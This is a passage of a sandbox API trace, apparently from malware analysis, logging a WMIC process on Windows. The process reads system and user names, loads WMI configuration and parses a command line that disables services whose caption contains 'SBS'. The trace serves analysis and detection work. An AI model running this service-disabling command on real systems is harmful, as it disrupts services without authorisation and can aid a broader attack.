| out: _Buffer="ms_409") returned 6 [0123.607] GetComputerNameW (in: lpBuffer=0x813b10, nSize=0x3afb84 | out: lpBuffer="LHNIWSJ", nSize=0x3afb84) returned 1 [0123.607] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.607] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.607] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0123.607] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x3afb98 | out: lpNameBuffer=0x0, nSize=0x3afb98) returned 0x0 [0123.608] GetLastError () returned 0xea [0123.608] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x813b38, nSize=0x3afb98 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x3afb98) returned 0x1 [0123.608] lstrlenW (lpString="") returned 0 [0123.608] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.608] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0123.609] lstrlenW (lpString=".") returned 1 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0123.609] lstrlenW (lpString="LOCALHOST") returned 9 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.609] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.610] lstrlenW (lpString="LHNIWSJ") returned 7 [0123.610] ResolveDelayLoadedAPI () returned 0x77bb9840 [0123.612] SysStringLen (param_1="IDENTIFY") returned 0x8 [0123.612] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0123.612] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0123.612] SysStringLen (param_1="IDENTIFY") returned 0x8 [0123.612] SysStringLen (param_1="IMPERSONATE") returned 0xb [0123.612] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0123.612] SysStringLen (param_1="IMPERSONATE") returned 0xb [0123.612] SysStringLen (param_1="IDENTIFY") returned 0x8 [0123.612] SysStringLen (param_1="IDENTIFY") returned 0x8 [0123.612] SysStringLen (param_1="IMPERSONATE") returned 0xb [0123.612] SysStringLen (param_1="DELEGATE") returned 0x8 [0123.612] SysStringLen (param_1="IDENTIFY") returned 0x8 [0123.612] SysStringLen (param_1="DELEGATE") returned 0x8 [0123.612] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0123.612] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0123.612] SysStringLen (param_1="DELEGATE") returned 0x8 [0123.612] SysStringLen (param_1="NONE") returned 0x4 [0123.612] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.612] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.612] SysStringLen (param_1="NONE") returned 0x4 [0123.612] SysStringLen (param_1="CONNECT") returned 0x7 [0123.612] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.613] SysStringLen (param_1="CALL") returned 0x4 [0123.613] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.613] SysStringLen (param_1="CALL") returned 0x4 [0123.613] SysStringLen (param_1="CONNECT") returned 0x7 [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="NONE") returned 0x4 [0123.613] SysStringLen (param_1="NONE") returned 0x4 [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="NONE") returned 0x4 [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0123.613] SysStringLen (param_1="DEFAULT") returned 0x7 [0123.613] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0123.613] SysStringLen (param_1="PKT") returned 0x3 [0123.613] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0123.613] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0123.613] GetSystemDirectoryW (in: lpBuffer=0x8129d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0123.613] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0123.613] SysStringLen (param_1="\\wbem\\") returned 0x6 [0123.613] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0123.614] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0123.614] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0123.614] GetCurrentThreadId () returned 0xc34 [0123.614] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x3af6a8 | out: phkResult=0x3af6a8*=0x164) returned 0x0 [0123.614] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x3af6b4, lpcbData=0x3af6b0*=0x400 | out: lpType=0x0, lpData=0x3af6b4*=0x30, lpcbData=0x3af6b0*=0x4) returned 0x0 [0123.614] _wcsicmp (_String1="0", _String2="1") returned -1 [0123.614] _wcsicmp (_String1="0", _String2="2") returned -2 [0123.614] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x3af6b0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x3af6b0*=0x42) returned 0x0 [0123.614] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x812be0, lpcbData=0x3af6b0*=0x42 | out: lpType=0x0, lpData=0x812be0*=0x25, lpcbData=0x3af6b0*=0x42) returned 0x0 [0123.614] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0123.614] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0123.614] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x3af6b4, lpcbData=0x3af6b0*=0x400 | out: lpType=0x0, lpData=0x3af6b4*=0x36, lpcbData=0x3af6b0*=0xc) returned 0x0 [0123.614] _wtol (_String="65536") returned 65536 [0123.614] RegCloseKey (hKey=0x0) returned 0x6 [0123.614] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x3afb48 | out: ppv=0x3afb48*=0xcb45a8) returned 0x0 [0123.624] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xcb45a8, xmlSource=0x3afac8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x3afb2c | out: isSuccessful=0x3afb2c*=0xffff) returned 0x0 [0123.668] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xcb45a8, DOMElement=0x3afb40 | out: DOMElement=0x3afb40) returned 0x0 [0123.669] SysStringLen (param_1="VALUE") returned 0x5 [0123.669] SysStringLen (param_1="TABLE") returned 0x5 [0123.669] SysStringLen (param_1="TABLE") returned 0x5 [0123.669] SysStringLen (param_1="VALUE") returned 0x5 [0123.669] SysStringLen (param_1="LIST") returned 0x4 [0123.669] SysStringLen (param_1="TABLE") returned 0x5 [0123.670] SysStringLen (param_1="RAWXML") returned 0x6 [0123.670] SysStringLen (param_1="TABLE") returned 0x5 [0123.670] SysStringLen (param_1="RAWXML") returned 0x6 [0123.670] SysStringLen (param_1="LIST") returned 0x4 [0123.670] SysStringLen (param_1="LIST") returned 0x4 [0123.670] SysStringLen (param_1="RAWXML") returned 0x6 [0123.670] SysStringLen (param_1="HTABLE") returned 0x6 [0123.670] SysStringLen (param_1="TABLE") returned 0x5 [0123.670] SysStringLen (param_1="HTABLE") returned 0x6 [0123.670] SysStringLen (param_1="LIST") returned 0x4 [0123.671] SysStringLen (param_1="HFORM") returned 0x5 [0123.671] SysStringLen (param_1="TABLE") returned 0x5 [0123.671] SysStringLen (param_1="HFORM") returned 0x5 [0123.671] SysStringLen (param_1="LIST") returned 0x4 [0123.671] SysStringLen (param_1="HFORM") returned 0x5 [0123.671] SysStringLen (param_1="HTABLE") returned 0x6 [0123.671] SysStringLen (param_1="XML") returned 0x3 [0123.671] SysStringLen (param_1="TABLE") returned 0x5 [0123.671] SysStringLen (param_1="XML") returned 0x3 [0123.671] SysStringLen (param_1="VALUE") returned 0x5 [0123.671] SysStringLen (param_1="VALUE") returned 0x5 [0123.671] SysStringLen (param_1="XML") returned 0x3 [0123.671] SysStringLen (param_1="MOF") returned 0x3 [0123.671] SysStringLen (param_1="TABLE") returned 0x5 [0123.671] SysStringLen (param_1="MOF") returned 0x3 [0123.671] SysStringLen (param_1="LIST") returned 0x4 [0123.672] SysStringLen (param_1="MOF") returned 0x3 [0123.672] SysStringLen (param_1="RAWXML") returned 0x6 [0123.672] SysStringLen (param_1="LIST") returned 0x4 [0123.672] SysStringLen (param_1="MOF") returned 0x3 [0123.672] SysStringLen (param_1="CSV") returned 0x3 [0123.672] SysStringLen (param_1="TABLE") returned 0x5 [0123.672] SysStringLen (param_1="CSV") returned 0x3 [0123.672] SysStringLen (param_1="LIST") returned 0x4 [0123.672] SysStringLen (param_1="CSV") returned 0x3 [0123.672] SysStringLen (param_1="HTABLE") returned 0x6 [0123.672] SysStringLen (param_1="CSV") returned 0x3 [0123.672] SysStringLen (param_1="HFORM") returned 0x5 [0123.673] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.673] SysStringLen (param_1="TABLE") returned 0x5 [0123.673] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.673] SysStringLen (param_1="VALUE") returned 0x5 [0123.673] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.673] SysStringLen (param_1="XML") returned 0x3 [0123.673] SysStringLen (param_1="XML") returned 0x3 [0123.673] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.673] SysStringLen (param_1="texttablewsys") returned 0xd [0123.673] SysStringLen (param_1="TABLE") returned 0x5 [0123.673] SysStringLen (param_1="texttablewsys") returned 0xd [0123.673] SysStringLen (param_1="XML") returned 0x3 [0123.673] SysStringLen (param_1="texttablewsys") returned 0xd [0123.673] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.673] SysStringLen (param_1="XML") returned 0x3 [0123.673] SysStringLen (param_1="texttablewsys") returned 0xd [0123.674] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.674] SysStringLen (param_1="TABLE") returned 0x5 [0123.674] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.674] SysStringLen (param_1="XML") returned 0x3 [0123.674] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.674] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.674] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.674] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.674] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.674] SysStringLen (param_1="TABLE") returned 0x5 [0123.674] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.674] SysStringLen (param_1="XML") returned 0x3 [0123.674] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.674] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.674] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.674] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.674] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.674] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="TABLE") returned 0x5 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="XML") returned 0x3 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.675] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.675] SysStringLen (param_1="TABLE") returned 0x5 [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.675] SysStringLen (param_1="XML") returned 0x3 [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.675] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.675] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.675] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.675] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.675] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="TABLE") returned 0x5 [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="XML") returned 0x3 [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="texttablewsys") returned 0xd [0123.676] SysStringLen (param_1="XML") returned 0x3 [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.676] SysStringLen (param_1="TABLE") returned 0x5 [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.676] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.676] SysStringLen (param_1="XML") returned 0x3 [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.676] SysStringLen (param_1="texttablewsys") returned 0xd [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.676] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0123.676] SysStringLen (param_1="XML") returned 0x3 [0123.676] SysStringLen (param_1="htable-sortby") returned 0xd [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="TABLE") returned 0x5 [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.677] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.677] SysStringLen (param_1="TABLE") returned 0x5 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.677] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.677] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.677] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.677] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0123.677] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.677] SysStringLen (param_1="wmiclimofformat") returned 0xf [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="TABLE") returned 0x5 [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.678] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.678] SysStringLen (param_1="TABLE") returned 0x5 [0123.678] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.678] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0123.678] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.678] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.678] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.678] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.678] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0123.678] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0123.679] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0123.679] FreeThreadedDOMDocument:IUnknown:Release (This=0xcb45a8) returned 0x0 [0123.679] GetCommandLineW () returned="WMIC SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'" [0123.679] memcpy_s (in: _Destination=0x818058, _DestinationSize=0x9e, _Source=0x5f1588, _SourceSize=0x96 | out: _Destination=0x818058) returned 0x0 [0123.679] GetLocalTime (in: lpSystemTime=0x3afaf0 | out: lpSystemTime=0x3afaf0*(wYear=0x7e2, wMonth=0x4, wDayOfWeek=0x0, wDay=0xf, wHour=0xa, wMinute=0x9, wSecond=0x10, wMilliseconds=0x215)) [0123.679] _vsnwprintf (in: _Buffer=0x818100, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x3afad0 | out: _Buffer="04-15-2018T10:09:16") returned 19 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString="SERVICE") returned 7 [0123.679] _wcsicmp (_String1="SERVICE", _String2="\"NULL\"") returned 81 [0123.679] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.679] lstrlenW (lpString="WHERE") returned 5 [0123.679] _wcsicmp (_String1="WHERE", _String2="\"NULL\"") returned 85 [0123.679] memmove_s (in: _Destination=0x812c78, _DestinationSize=0x4, _Source=0x812c68, _SourceSize=0x4 | out: _Destination=0x812c78) returned 0x0 [0123.680] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.680] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0123.680] _wcsicmp (_String1="'caption LIKE '%SBS%''", _String2="\"NULL\"") returned 5 [0123.680] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0123.680] lstrlenW (lpString="'caption LIKE '%SBS%''") returned 22 [0123.680] memmove_s (in: _Destination=0x817cb0, _DestinationSize=0x8, _Source=0x812c78, _SourceSize=0x8 | out: _Destination=0x817cb0) returned 0x0 [0123.680] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.680] lstrlenW (lpString="CALL") returned 4 [0123.680] _wcsicmp (_String1="CALL", _String2="\"NULL\"") returned 65 [0123.680] memmove_s (in: _Destination=0x817f68, _DestinationSize=0xc, _Source=0x817cb0, _SourceSize=0xc | out: _Destination=0x817f68) returned 0x0 [0123.680] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.680] lstrlenW (lpString="ChangeStartMode") returned 15 [0123.680] _wcsicmp (_String1="ChangeStartMode", _String2="\"NULL\"") returned 65 [0123.680] memmove_s (in: _Destination=0x812418, _DestinationSize=0x10, _Source=0x817f68, _SourceSize=0x10 | out: _Destination=0x812418) returned 0x0 [0123.680] lstrlenW (lpString=" SERVICE WHERE 'caption LIKE '%SBS%'' CALL ChangeStartMode 'Disabled'") returned 71 [0123.680] lstrlenW (lpString="'Disabled'") returned 10 [0123.680] _wcsicmp (_String1="'Disabled'", _String2="\"NULL\"") returned 5 [0123.680] lstrlenW (lpString="'Disabled'") returned 10 [0123.680] lstrlenW (lpString="'Disabled'") returned 10 [0123.680] lstrlenW (lpString="QUIT") returned 4 [0123.680] lstrlenW (lpString="SERVICE") returned 7 [0123.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="QUIT", cchCount2=4) returned 3 [0123.680] lstrlenW (lpString="EXIT") returned 4 [0123.680] lstrlenW (lpString="SERVICE") returned 7 [0123.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="EXIT", cchCount2=4) returned 3 [0123.680] WbemLocator:IUnknown:AddRef (This=0x5f74f0) returned 0x2 [0123.680] lstrlenW (lpString="/") returned 1 [0123.680] lstrlenW (lpString="SERVICE") returned 7 [0123.680] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="/", cchCount2=1) returned 3 [0123.680] lstrlenW (lpString="-") returned 1 [0123.680] lstrlenW (lpString="SERVICE") returned 7 [0123.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="-", cchCount2=1) returned 3 [0123.681] lstrlenW (lpString="CLASS") returned 5 [0123.681] lstrlenW (lpString="SERVICE") returned 7 [0123.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CLASS", cchCount2=5) returned 3 [0123.681] lstrlenW (lpString="PATH") returned 4 [0123.681] lstrlenW (lpString="SERVICE") returned 7 [0123.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="PATH", cchCount2=4) returned 3 [0123.681] lstrlenW (lpString="CONTEXT") returned 7 [0123.681] lstrlenW (lpString="SERVICE") returned 7 [0123.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SERVICE", cchCount1=7, lpString2="CONTEXT", cchCount2=7) returned 3 [0123.681] lstrlenW (lpString="SERVICE") returned 7 [0123.681] lstrlenW (lpString="SERVICE") returned 7 [0123.681] GetCurrentThreadId () returned 0xc34 [0123.681] ??0CHString@@QAE@XZ () returned 0x3afa44 [0123.681] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f74f0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349540 | out: ppNamespace=0x1349540*=0x6205e0) returned 0x0 [0123.704] CoSetProxyBlanket (pProxy=0x6205e0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0123.704] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.704] GetCurrentThreadId () returned 0xc34 [0123.704] ??0CHString@@QAE@XZ () returned 0x3af9ec [0123.705] SysStringLen (param_1="root\\cli") returned 0x8 [0123.705] SysStringLen (param_1="\\") returned 0x1 [0123.705] SysStringLen (param_1="root\\cli\\") returned 0x9 [0123.705] SysStringLen (param_1="ms_409") returned 0x6 [0123.705] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5f74f0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349544 | out: ppNamespace=0x1349544*=0x620ae0) returned 0x0 [0123.713] ??1CHString@@QAE@XZ () returned 0x74a66430 [0123.713] GetCurrentThreadId () returned 0xc34 [0123.714] ??0CHString@@QAE@XZ () returned 0x3afa48 [0123.714] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0123.714] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0x818a60, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0123.714] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0123.714] SysStringLen (param_1="SERVICE") returned 0x7 [0123.714] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0123.714] SysStringLen (param_1="'") returned 0x1 [0123.714] IWbemServices:GetObject (in: This=0x6205e0, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0x3afa44*=0x0, ppCallResult=0x0 | out: ppObject=0x3afa44*=0x645318, ppCallResult=0x0) returned 0x0 [0123.721] IWbemClassObject:Get (in: This=0x645318, wszName="Target", lFlags=0, pVal=0x3afa1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3afa1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_Service", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.721] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0123.721] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0123.721] IWbemClassObject:Get (in: This=0x645318, wszName="PWhere", lFlags=0, pVal=0x3afa1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3afa1c*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="WHERE Name='#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] lstrlenW (lpString="WHERE Name='#'") returned 14 [0123.722] lstrlenW (lpString="WHERE Name='#'") returned 14 [0123.722] IWbemClassObject:Get (in: This=0x645318, wszName="Connection", lFlags=0, pVal=0x3afa1c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x3afa1c*(varType=0xd, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x6456d8, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0123.722] IUnknown:QueryInterface (in: This=0x6456d8, riid=0x13069ac*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, 